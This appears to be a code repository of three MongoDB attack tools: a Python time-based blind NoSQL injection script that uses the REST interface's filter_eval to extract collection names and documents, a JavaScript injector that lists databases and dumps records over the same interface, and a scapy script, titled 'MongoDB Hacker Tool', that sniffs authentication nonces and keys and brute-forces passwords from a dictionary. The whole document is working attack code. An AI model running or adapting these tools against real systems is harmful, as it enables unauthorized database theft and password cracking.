├── blind_nosql.py ├── rest_inject_old.js └── sniff_brute.py /blind_nosql.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | from time import * 3 | import urllib 4 | 5 | def get_ans(query): 6 | t1 = int("%u" % time()) 7 | url = 'http://localhost:28017/admin/$cmd/?filter_eval=conn = new Mongo("127.0.0.1"); db = conn.getDB("secure_nosql"); if ( '+query+') { sleep(9000); exit; }&limit=1' 8 | urllib.urlopen(url) 9 | t2 = int("%u" % time()) 10 | if (t2 - t1) >= 2 : 11 | return 1 12 | else: 13 | return 0 14 | 15 | def get_coll_names_count(num): 16 | print "*****************\nGetting length of "+str(num)+" collection\n*****************" 17 | count = 0 18 | while get_ans('db.getCollectionNames()['+str(num)+'].length == "'+str(count)+'"') != 1: 19 | print get_ans('db.getCollectionNames()[0].length == "'+str(count)+'"') 20 | print "Trying "+str(count)+" symbols" 21 | count+=1 22 | 23 | print "Found - "+str(count)+" symbols" 24 | return count 25 | 26 | 27 | def get_coll_names(num): 28 | print "*****************\nGetting the name of "+str(num)+" collection\n*****************" 29 | word='' 30 | for a in xrange(get_coll_names_count(num)): 31 | for sym in "abcdefghijklmnopqrstuvwxyz": 32 | print "["+str(a)+"] Trying '"+sym+"'" 33 | if get_ans('db.getCollectionNames()['+str(num)+']['+str(a)+'] == "'+str(sym)+'"') == 1: 34 | print "["+str(a)+"] Found '"+sym+"'" 35 | word += sym 36 | print word 37 | break 38 | print word 39 | return word 40 | 41 | 42 | def get_document_from_collection_count(num, col): 43 | print "*****************\nGetting length of "+str(num)+" document in "+str(col)+" collection \n*****************" 44 | count = 0 45 | while get_ans('tojson(db.'+str(col)+'.find()['+str(num)+']).length == "'+str(count)+'"') != 1: 46 | print "Trying "+str(count)+" symbols" 47 | count+=1 48 | 49 | print "Found - "+str(count)+" symbols" 50 | return count 51 | 52 | 53 | def get_document_from_collection(num, col): 54 | print "*****************\nGetting "+str(num)+" from "+col+" collection\n*****************" 55 | word='' 56 | for a in xrange(50, get_document_from_collection_count(num, col)): 57 | for sym in "ABCDEFGHIJKLMNOPQRSTUVWXYZ<>,./?abcdefghijklmnopqrstuvwxyz: {}]['\"!@#$^%&*()_-1234567890=\t\n": 58 | print "["+str(a)+"] Trying '"+sym+"'" 59 | if get_ans('tojson(db.'+col+'.find()['+str(num)+'])['+str(a)+'] == "'+str(urllib.quote_plus(sym))+'"') == 1: 60 | print "["+str(a)+"] Found '"+sym+"'" 61 | word += sym 62 | print word 63 | break 64 | print word 65 | return word 66 | 67 | 68 | #get_document_from_collection(0, get_coll_names(2)) 69 | -------------------------------------------------------------------------------- /rest_inject_old.js: -------------------------------------------------------------------------------- 1 | function getXmlHttp(){ 2 | var xmlhttp; 3 | try { 4 | xmlhttp = new ActiveXObject("Msxml2.XMLHTTP"); 5 | } catch (e) { 6 | try { 7 | xmlhttp = new ActiveXObject("Microsoft.XMLHTTP"); 8 | } catch (E) { 9 | xmlhttp = false; 10 | } 11 | } 12 | if (!xmlhttp && typeof XMLHttpRequest!='undefined') { 13 | xmlhttp = new XMLHttpRequest(); 14 | } 15 | return xmlhttp; 16 | } 17 | 18 | function getDatabases(num) { 19 | var xmlhttp = getXmlHttp() 20 | xmlhttp.open('GET', '/listDatabases?text=1', false); 21 | xmlhttp.send(null); 22 | if(xmlhttp.status == 200) { 23 | a = JSON.parse(xmlhttp.responseText); 24 | return JSON.stringify(a.databases[num].name) 25 | } 26 | } 27 | 28 | function getCollectionFromDB(num, db, host) { 29 | var xmlhttp = getXmlHttp() 30 | xmlhttp.open('GET', '/admin/$cmd/?filter_eval=function() {conn = new Mongo("'+host+'"); db = conn.getDB('+ db +'); return db.getCollectionNames(); }&limit=1', false); 31 | xmlhttp.send(null); 32 | if(xmlhttp.status == 200) { 33 | a = JSON.parse(xmlhttp.responseText); 34 | return JSON.stringify(a.rows[0].retval[num]) 35 | } 36 | } 37 | 38 | function getDocumentFromColl(num, coll, db) { 39 | var xmlhttp = getXmlHttp() 40 | xmlhttp.open('GET', '/'+db.replace("\"", "").replace("\"", "")+'/'+coll.replace("\"", "").replace("\"", "")+'/', false); 41 | xmlhttp.send(null); 42 | if(xmlhttp.status == 200) { 43 | a = JSON.parse(xmlhttp.responseText); 44 | return JSON.stringify(a.rows[num]).slice(43,-1).replace(",", " "); 45 | } 46 | } 47 | 48 | b = getDocumentFromColl(0, getCollectionFromDB(2, getDatabases(0)), getDatabases(0), "127.0.0.1" ) 49 | console.log(b); 50 | -------------------------------------------------------------------------------- /sniff_brute.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | #coding: utf8 3 | __author__ = "cyber-punk" 4 | 5 | from scapy.all import * 6 | import re 7 | import hashlib 8 | 9 | md5 = hashlib.md5 10 | 11 | print "*********************\n*MongoDB Hacker Tool*\n***Sniff and Brute***\n*********************\n" 12 | 13 | 14 | def get_packets(port, iface, count): 15 | packets = sniff(filter="port "+str(port)+"", count=count, iface=str(iface)) 16 | return packets 17 | 18 | def parse_packets(port, iface, count): 19 | print "Sniff packages..." 20 | packets = get_packets(port, iface, count) 21 | print "Parse packages..." 22 | for i in xrange(len(packets)): 23 | if "key" in re.findall(r'[A-Za-z0-9]{3,}', str(packets[i])): 24 | packet=packets[i] 25 | break 26 | user = re.findall(r'[A-Za-z0-9]{3,}', str(packet))[4] 27 | nonce = re.findall(r'[A-Za-z0-9]{3,}', str(packet))[6] 28 | key = re.findall(r'[A-Za-z0-9]{3,}', str(packet))[8] 29 | return user, nonce, key 30 | 31 | 32 | def gen_pass(user, nonce, passw): 33 | return md5(nonce + user + md5(user + ":mongo:" + str(passw)).hexdigest()).hexdigest(); 34 | 35 | 36 | def brute_pass(): 37 | user, nonce, key = parse_packets("27017", "lo", 10) 38 | print "Prepair to brute..." 39 | file = open('dict.txt') 40 | file_len = open('dict.txt') 41 | for i in xrange(len(file_len.readlines())): 42 | passw = file.readline().split('\n')[0] 43 | if gen_pass(user, nonce, passw) == key: 44 | print "\nFound - "+user+":"+passw 45 | break 46 | 47 | 48 | brute_pass() --------------------------------------------------------------------------------